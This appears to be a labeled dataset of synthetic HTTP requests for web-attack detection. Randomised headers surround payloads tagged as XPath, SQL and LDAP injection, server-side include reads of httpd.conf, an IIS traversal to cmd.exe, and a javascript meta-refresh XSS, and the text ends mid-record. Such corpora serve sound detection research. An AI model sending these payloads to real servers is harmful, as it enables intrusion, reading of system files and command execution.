GET /snYtat6liR8rxwlo/xmltmp.JXGrC0/fDnreeSancomhegsrw/akmtr9wtIow/tsheak7O1acssOadtppe/cI2t2J3/qdeleteCSJzRsYX9/dr5ZtIU_a--8H6/bocitadwzgoaettryss/etP@C5DXiAx/an_3lF1ZcxPMaHgxYDI.shtml?one9rb1Az9u=869&snhetadnMm9lorW=3&bfieaf8ah=Uz+a&oehe22Iavcs=56&ralsh=%28i+%3C+++++count%28Nr%2Fchild%3A%3Atext%28%29%29++++and+++++j+++%3C+++++count%28Ehud48%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++%3C++count%28ddhefl%2Fchild%3A%3A*%29++++%29&wBf9@ps.pBQYJ=a&binQVymuqU=55&vhT9n-@c=5ntqdlnabhts3ssnht&ye10olitea=i4Ztio5d8nteiov HTTP/1.0
Host: www.aditDnlen3.cz
Connection: keep-alive
Accept: audio/*;q=0.3, audio/basic;q=0.5, text/xml;q=0.5
Accept-Charset: iso-8859-4;q=0.0, x-mac-arabic;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=24
Client-ip: 144.73.134.163
Cookie: aRoahifymyIBer=642922667
Cookie2: $Version="415"
Date: Fri, 01 May 09 23:45:32 GMT
ETag: W/"5SJ1rsuHDeMmiBuju"
Expect: oitbte
From: tbcbeeti@dlnmnmt.be
If-Modified-Since: Fri, 13 Feb 04 15:52:28 UTC
If-Unmodified-Since: Tue, 10 Feb 04 22:25:29 GMT
If-Match: "epaBLMRE1Y4GzxZKArzw"
If-None-Match: *
If-Range: "-Bh00.poTdNj1qRd"
Max-Forwards: 1888
MIME-Version: 2.9
Pragma: e=re
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: paIta yEnolhc=1srhn
Range: 50519-,-46393
Referer: /auUirM/Ieo3/2teaM/bepe.png
TE: deflate,gzip
Trailer: Upgrade
User-Agent: Mozilla/2.7 (X11; U; Unix 4.0; b3-ax; rv:5.5.8) Gecko/89049616
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 953x2070
Via: 4.7 www.crzE.shtml, FTP/2.6 www.suxz.js
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 5083786
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49346
Start - Id: 49538
class: XPathInjection
GET /r8dyoV5vyU1/lKkQ/seayuhlhptftoaU/elrh4qhnly33ZAkbhnql/ie8gnE/Ei4BaXo9wzg.php4?DT4OH0VlPB=2218&a1sta=s2e&gn=tcmawtm&eDzXFaIbgsound=9+++++or+++1%3C+++++e5%2Founn%2Ftma%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++or++++42955%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ieihxil5=p-KMWeK HTTP/1.0
Host: 16.212.86.238
Connection: close
Accept: audio/*, audio/basic;q=0.4, video/*;q=0.0
Accept-Charset: windows-1257, iso-8859-1;q=0.4, x-mac-roman;q=0.1, us-ascii, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 89.70.223.74
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="0"
Date: Tue, 03 Aug 04 08:18:57 CET
ETag: "bHghOmTBfDFajHx3kO"
Expect: edehn3bs=oglslt
From: ntesM@cHe7tnfpjs.org
If-Modified-Since: Wed, 19 Aug 09 02:10:03 GMT
If-Unmodified-Since: Fri, 08 Jun 07 13:55:28 UTC
If-Match: "rZAp-iTTM8z64R-D"
If-None-Match: "6L70SZ3iZksBSyZ"
If-Range: Wed, 09 Aug 06 04:23:00 CET
Max-Forwards: 4860
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic ZHBtaXM3dDpoYTliYTU=
Range: -5,-835621,4-66
Referer: http://69sta.biz/aBLSvmr.sh
TE: trailers
Trailer: Date
User-Agent: zeseye
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 750x884
Via: FTP/6.6 134.198.123.18, HTTP/6.4 220.108.114.195
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 79.10.240.68
X-Serial-Number: 84222466016930
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49538
Start - Id: 39635
class: SSI
GET /ez07JasSk5R/ZVgPfS6Q/vxBY3FBmh/RnElNehhjrk/rrLQQhEO_vg4u/fdr5a4rsoeepahr/rwinntwzps@2zILcatAcopy/usrvr/risben/dT/vPR3otPsna.RQmi.css?@DshhtaccesVexjpe=6&kleqyi=ei1x%3AeeAwsc&cbcservicesjh1wp-havingi=13&AeaA3hAa=5067748115&rnwn=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&ltt=offur77&rrat9oct=ta+4dpa&@3@85WCR=rj4AtrCsu&e2ei=%40ylegh%25r1&aes8AhwhAcerf=85&tkheEagh=4nnNQdl HTTP/1.1
Host: 11.199.240.103
Connection: close
Accept: application/rtf, text/html;q=0.9
Accept-Charset: windows-1250;q=0.6, utf-7;q=0.2
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: max-age=43649
Client-ip: 247.22.50.108
Cookie: fsba7bbprao1Eeg=ldelete;emegmSe0otbtoch=@9;0nt=7;5metapBuniontx-=execn
Cookie2: $Version="9"
Date: Sun, 12 Nov 06 02:15:51 CET
ETag: "@Py@vCbgWDBllPns"
Expect: irarnre
From: metmxas@4atEjc.ch
If-Modified-Since: Mon, 08 Jan 07 24:32:16 GMT
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: *
If-Range: Tue, 15 May 07 15:09:22 GMT
Max-Forwards: 375
MIME-Version: 1.8
Pragma: C='mfyfl'
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: NTLM aHJlY2V5NHNlYXJhZXJubXJoc3hpZnZTNWxTem5hcnVodDdhcjVs
Range: -8469,086240-,65-225201
Referer: /ustpx/oitltge/tedts/rrcolUtf.mp3
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: t7G-MRlKA http://www.aL1tep5.it
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 0092930579108087873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39635
Start - Id: 48617
class: XPathInjection
PUT /a9cVc9JPUd79gkptDUz/tt9pnlaaidMhthlge6ii/lcOIrsIt.aj5n4MUH/ia2owoptbwfend/AWHcav/IG88DG.PQ6ONH/oeTfxe/tM/stlequntinyle9t8oqe9/h0z1cWaFqTaG1.gif? HTTP/1.0
Content-Length: 339
Content-Language: djEoaaaC,nrt2
Content-Encoding: deflate
Content-Location: /eunreo/9atcne/onnh.jsp
Content-MD5: Y3VlcGVhY2FodHJocjIxbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 19 Dec 06 16:49:46 GMT
Host: www.9ex3dn.be
Connection: ss8hehe
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 74.177.18.101
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Thu, 31 Dec 09 18:42:27 GMT
ETag: W/"1CX2bE-9oH-UtC@"
Expect: 100-continue
From: ewioailt@flio7hb.com
If-Modified-Since: Wed, 04 Feb 09 09:04:53 GMT
If-Unmodified-Since: Wed, 24 Mar 10 08:07:47 UTC
If-Match: "BYvSWUPhani0Q3YK"
If-None-Match: *
If-Range: Fri, 28 Mar 08 09:59:35 CET
Max-Forwards: 6
MIME-Version: 7.4
Pragma: iuide9='Wte5at'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /aeEoyTi/0qzi/eRm4neag/eehruhq7/plii7.pl
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: ebrswf
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: deflate
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

msf=<)&rp4lrNMbibA2=oiEwh6document:l&nin4rev=14294&8Qm.hitAbgsound=teLf6'   or count(  path/child::node()[position()=((i  +   j +    k    +    l    + 1)]     |     path/child::*()[position()=(k+1)])=1    or    'ey9e'  =   '    S3' or&rtiitaetlChSacO=os4

End - Id: 48617
Start - Id: 38736
class: LdapInjection
GET /y7_U.y1Y1hx32Z1PBz/7.Jv6.gif?7prREqGpasswdc=emmtbc5&brhtcfeyw3=%29%28+++%7C++%28cl%3Dusnit*%29&tr42=92&h0toa=7&oneH=1adsws7&0j=9207360577&pnnloa=90499741&N_4JKiAGGg=307914&acefafep8is5ls=rwjQ1&nnreqtttweatliw=483399&uuirh=%3Fm&rr=i8q+o&s9he=tiaaw HTTP/1.0
Host: www.t715.ch
Connection: close
Accept: image/*;q=0.1, application/*, video/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: A0n=23;5yid=akkBP-3AAG@;ao=mKK0kYEhb;XCes=hc%;1zTodei2e=o En;ltngrhnN=nnih6r d
Cookie2: $Version="97"
Date: Mon, 11 May 09 17:40:44 CET
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: Eirzruo
From: BtenoI@9Rnek.gov
If-Modified-Since: Wed, 17 Oct 07 04:58:58 GMT
If-Unmodified-Since: Sat, 15 Aug 09 09:56:25 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: "KJ@.FoCGdiCsCQfMtxT"
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 5
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest username="jobam3xe"
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: /7nnttlLn/rfuUtt/qoti.pl
TE: chunked,gzip,trailers
Trailer: Authorization
User-Agent: ev3meiobat/5.0.3.0.2
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 0.9 www.remams.png, 1.9 www.iiipubNl.shtml
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38736
Start - Id: 36465
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 80.156.214.135
Connection: keep-alive
Accept: video/*;q=0.9, audio/x-wav, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: 8negrsat-de0shs;q=0.8, Taerioit-sCrfamn;q=0.9, metJc-rS
Cache-Control: no-cache
Client-ip: 9.139.53.150
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="0"
Date: Sun, 14 Dec 08 03:45:16 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Sat, 09 Jul 05 18:00:32 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 3
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Digest response="6bcfaCb42a9eCF8FdFe9b93a3aBFdcb8"
Range: 57-,410056-,436232-1281
Referer: http://www.srer.de/euba.mdb
TE: trailers,gzip
Trailer: Accept
User-Agent: Mozilla/1.3 (Machintosh; U; PPC 2.3; et-Wa; rv:4.0.1) Gecko/20296017
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.eikhso.png
Transfer-Encoding: gzip
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36465
Start - Id: 42448
class: SqlInjection
GET /obee/AERTxmlAscriptkBFhtelnet/4gM@esYhcGy1Ud/sycZYCdnecIg9-f/eA.tiff?s7y4n=e+i%29%3B&nSmHti1oEqc=tRNS1CxYOO&izolormSt=inputameoscriptzo5eyD%3Frsko&3nf7impeainlptf=de0&ndoe6tamltftw=%27%29+UNION++++ALL++SELECT+te++%2C+++++snd+++%2C+otesheot++++FROM+++++uOwnid+WHERE++brtsh0ywf+++NOT+++IN+++%28%27soleee%27++++%29++AND+++++m1h1+++NOT++IN+++%28++%27Hye%27++++%29+AND++%27%27+++%3D++%27&ApQCkOwjEpassthruC=3+indt7tuasl&uunst5=jvRiepa8 HTTP/1.1
Host: www.ecbmBon.uk
Connection: ojIMi
Accept: image/*;q=0.6, video/mpeg
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: wdeu7rF=o
Client-ip: 14.55.211.228
Cookie: cdopennin=Fkobjectk;Duftb6=173
Cookie2: $Version="574"
Date: Tue, 17 Oct 06 02:54:18 CET
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 8iyua=geano5a;hrrnm=tEmsnt
From: erEcOsi@8seaoan.st
If-Modified-Since: Tue, 28 Sep 04 22:30:47 UTC
If-Unmodified-Since: Sat, 19 May 07 10:25:02 UTC
If-Match: "Jfw352DZeXPs16bXYX6J"
If-None-Match: *
If-Range: "XP13dXNeBcxhACYPP@"
Max-Forwards: 9
MIME-Version: 0.7
Pragma: eblmoe='msqTsn'
Proxy-Authorization: Digest realm
Authorization: 6etZn6 8aee6rp=5Oi3t
Range: 6369-,501-7998
Referer: /tOir.php4
TE: deflate;q=0.1,deflate;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: hAtmr (aF-WPQB; msWNrPU0TQ; iHOlszw)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x6235
Via: sgt/9.9 219.217.149.18, FTP/9.4 www.6tEK.htm, 3.5 www.6ufpt.png
Transfer-Encoding: aoezn
Upgrade: Akupc/1.8, aT6m/0.6
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42448
Start - Id: 35737
class: XPathInjection
GET /-sfpsbzaWauUpasswduD/h9nw6SDhmt-xKeb/09ac9l/haorAmEotsnt/ifPi89OYHN-N/00AESpBxi1/7.X5VuxZFm_IyK./oG5Z4cWiGQl/eQei/aurrf/kq1Orlocation7q0TuZ@4.jpeg?eQvUzIwp-=6971234861&zhy6H2xtermvhttpsw0F=v243&y4=98576&Mtdoncp=eug&_ULZz.=ibeqooth&A8rdahwmxx=2rs%7C&moullRaayawowN6=pit&lx71zjl=662&tnes=ujglsts%27+or+%28i+++%3C++++count%28osr%2Fchild%3A%3Atext%28%29%29++and+++j+++++%3C+++count%28em%2Fchild%3A%3Acomment%28%29%29+++++and+++++k++%3C++++count%28irder4%2Fchild%3A%3A*%29+++%29+++++or+++%27ne7n4i%27+++%3D+++%27+ri0Eje%27+or&ymV=+rOr+&cd8hlsp2ls=8637&winntgGoG_=nree4senfii3o&wmnpDn7ds=nolOa&4ienzO7eejrteen=goiframeqs&oirhtaigmT=59541 HTTP/1.1
Host: 1.55.49.144
Connection: keep-alive
Accept: application/*, audio/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=93
Client-ip: 23.174.149.92
Cookie: zmAliwwf6rud=awesalinky0~ynoh;aitnRnt=yo;hteeu=40;5rh=cBu;rM_iS=fuvolve
Cookie2: $Version="4"
Date: Sun, 12 Sep 04 20:13:38 GMT
ETag: ".K6gb8w9354WkpOJZLYp"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Mon, 12 May 08 07:58:56 GMT
If-Match: *
If-None-Match: *
If-Range: "WtN5ukWEG4fdPutgsY"
Max-Forwards: 22
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="ta7oAu"
Authorization: Digest nonce
Range: 820401-
Referer: /isnlnnhr/e3el/hn4n/b9lo.nsf
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/4.2 (compatible; Konqueror/5.8; Linux i586; ieneaauytn)
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 6.1 125.114.92.152
Transfer-Encoding: gzip
Upgrade: oretk/3.3, 5iN/2.4, mntxa/1.5, aeiir/6.2, nfo/9.7
Warning: 093 www.Ieie.htm "d6amUeljrciludeds4l" "Sat, 17 May 08 17:12:51 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35737
Start - Id: 48948
class: XPathInjection
GET /gZfIm3Ub7/Z.Y/esainotjlsbefsNoda/atlxe3bmgvUzxRji2/sp_mDP/7iejoci/eEWq.suX6A.pl?aEitlitqecobcn=n-vp1eZ_mE&zii5vacdinltrs=14455479&2CKYvimg2childTe=fReN&QU4WdV=tnce&wsRp6Yae=7640&shcedeusEEdreyL=22327604&xwonh2ut=nrut&Ozr8ah=maYsyt%27%5D++++%7C+++P++++%7C+%2F%2Fuser%5B+++++name%2Ftext%28++++%29+++%3D++%271k&bmthtfZ6elaadtt=hw74h&oAemtsr=h+tunti&So=rarsystemoc&NIFhttpsb5mt@Im=ow&meB=3&iesEtDtetwbtaao=execnmDrawtmpvbscript&ZT4nrS8x=827 HTTP/1.1
Host: 95.4.240.0
Connection: wtti
Accept: text/plain;q=0.9, image/png
Accept-Charset: x-mac-chinesetrad;q=0.6, windows-1258, windows-1253
Accept-Encoding: deflate, deflate;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 89.226.28.116
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sat, 29 Dec 07 02:08:21 GMT
ETag: "i8pw8MiXbYxDFs-"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Wed, 29 Jun 05 20:39:43 UTC
If-Unmodified-Since: Sat, 28 May 05 08:29:09 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 65
MIME-Version: 8.7
Pragma: 2olct=t
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: http://www.a7hm1Efi.net/oT2gl.css
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: k0ThQlw2 http://www.lyhd.fr
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48948
Start - Id: 48819
class: XPathInjection
GET /o9SKHPeP/copyGMV_Lobjectv/PRye/hfc1fnE/j7T5HkhNcVC1WP62v_jS.mdb?h5aqr=+&bAAhV=jehdshr%27%5D+++%7C++++P+%7C++%2F%2Fuser%5B+++++name%2Ftext%28+%29%3D%27megE2&NVscriptucmYlog51=nyrna&aycm5asenijnhnt=etscripty%3C7l%29nee%7Ca HTTP/1.1
Host: www.tncMmt1.net
Connection: keep-alive
Accept: video/*;q=0.1, video/*;q=0.6, image/png;q=0.9
Accept-Charset: hz-gb-2312;q=0.9, x-mac-turkish;q=0.3, euc-cn;q=0.2
Accept-Encoding: 
Accept-Language: Tcdi-smmlIais, ge0-0eme;q=0.6, wju-ensu, tmhtubf-y, eecmOi-t0q;q=0.9
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: ejimrmsrrtpa5ee=izH;ayiuqxt=4rd;oJU7t=533369;awbt=qhbP.vx.lg;NP0Hhscripto6U=wvllsrlix
Cookie2: $Version="5"
Date: Sun, 13 Apr 08 10:13:37 UTC
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 07 Jun 06 10:00:23 CET
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "pnb8US@PQvkwzbscxdMT"
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest nonce
Range: 5920-3
Referer: /op72iOld/sxea/inol/tAn4me/ejae.sh
TE: deflate;q=0.3,gzip
Trailer: If-Match
User-Agent: Mozilla/4.6 (Windows; U; Win98 6.9; ot-ty; rv:1.2.6) Gecko/92653344
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48819
Start - Id: 48197
class: XSS
PUT /h8idinenght/9SRQd1zC4-V_dS5/VRI@rpft5O/x8Qc/ebR/6VFGtWiFz.g0/tvUKWu76Nej.OvBp_PDn/u_oIMrilGb5C8/upaFGNo/wuhsnnesahey/rgi6ZhjBJgu.z2p-u.bin? HTTP/1.0
Content-Length: 152
Content-Language: hsobM,5ngzAm,emuia
Content-Encoding: gzip
Content-Location: /n6pn1Ecr/ye6Tn/gnnoa.doc
Content-MD5: Tmlsb2Fhb2xycm5oZW5uZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Jan 09 10:17:38 CET
Last-Modified: Sun, 26 Dec 04 07:33:44 UTC
Host: www.iOuT.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.6, utf-7;q=0.9, iso-8859-3;q=0.0, windows-1253;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: <meta   http-equiv = "    refresh "     content   =   " 0;url=javascript:    [alert  ('pa5t');]"   >
Cache-Control: only-if-cached
Client-ip: 228.142.202.24
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Cookie2: $Version="2"
Date: Thu, 03 Jan 08 07:21:03 UTC
ETag: W/"__Prerwr1jnojp8xn"
Expect: 8tgno=ietph
From: lcdwth@njitaNrh.com
If-Modified-Since: Sat, 08 Jan 05 02:47:38 CET
If-Unmodified-Since: Tue, 05 Oct 04 20:17:08 CET
If-Match: "_ZpeF5w8xIE665DPiS8"
If-None-Match: "berDR4axR9yhkwq.B"
If-Range: "EX0NzQs@bHgVAAdi"
Max-Forwards: 9469
MIME-Version: 2.8
Pragma: fsnpo=e1gbr
Proxy-Authorization: Basic ZHI0bWU6YVRlbg==
Authorization: Digest nc=8A23f0B3
Referer: http://c9dasj.net/rtheTTt/cvcadz/erua/osh4ds/q2ui7hAt.sh
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/1.9 (X11; U; Open BSD i386 8.5; fq-le; rv:1.2.3) Gecko/13622412
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Pixels: 9098x7703
Via: oesO9/8.0 168.114.250.243, 8.1 www.beEhsh5.js, 7.2 174.243.0.149
Transfer-Encoding: compress
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

arseGohs=hia&xesonieLnrt=vB7BjFIMdI&nar6e=53&fKewgS=tDwaoseoaocenri&@GRYMUZ=8Nht@iAnhreplacernevalnl&mpmi=643952&t2pemree=mmi)eio'&s3ofaeAh=030904

End - Id: 48197
Start - Id: 49314
class: XPathInjection
GET /ac/ssOExaab/unt/o4rwmTyz/uskzfotit7neRcSf/4yDetf8faawansAr/behm/eEas.sh?astt6fhe=hkWRthsxXM9&EuuxIn4sb7Go9l=njhV3we2-Up&LxMLsx-Tscript=3aeai&ki=+uoh&rGbPKwO-auW=772235&os5idmt=%28i++%3C+count%28na%2Fchild%3A%3Atext%28%29%29+++and++j+%3C+++count%28tesdti%2Fchild%3A%3Acomment%28%29%29+++and++++k++++%3C+count%28itengh%2Fchild%3A%3A*%29+++%29 HTTP/1.0
Host: www.uhTsaje8i.de
Connection: close
Accept: */*
Accept-Charset: iso-8859-4
Accept-Encoding: *;q=0.6
Accept-Language: Emtlos-zxiasihw, Myty8ai-ytI, 5alns4n-yinghz, ee8-lx;q=0.4
Cache-Control: max-stale
Client-ip: 19.197.54.208
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="01"
Date: Sat, 20 Aug 05 14:58:17 UTC
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Fri, 03 Sep 04 17:15:53 UTC
If-Match: *
If-None-Match: "aWCWnw0.uGysj-Pu"
If-Range: Fri, 18 Nov 05 04:26:47 CET
Max-Forwards: 504
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: NTLM M2FsaXMzbmlxaGV1bnlsc3hFdGJnZmUxZ0hlaHUzZXROcHJh
Range: 28823-,87212-
Referer: /pT6nyEgo/aloes/ple0no.gz
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: 64Y_V-kn http://www.oe9sp.fr
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: dni/4.9 184.216.170.59, FTP/3.4 www.eath.jpg
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49314
Start - Id: 42757
class: SqlInjection
PUT /9.bY7c/B9tmpjhV1window.openiSinsert.html? HTTP/1.0
Content-Length: 312
Content-Language: TNndT,o,rsh
Content-Encoding: gzip
Content-Location: http://deeyae.it/So9n0flI/oanop/RnEaa/t0nn/5ere7.tar
Content-MD5: YXRvSTljaWluYWE5bWM4bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 22:02:21 UTC
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: www.bmbr.be
Connection: keep-alive
Accept: */*
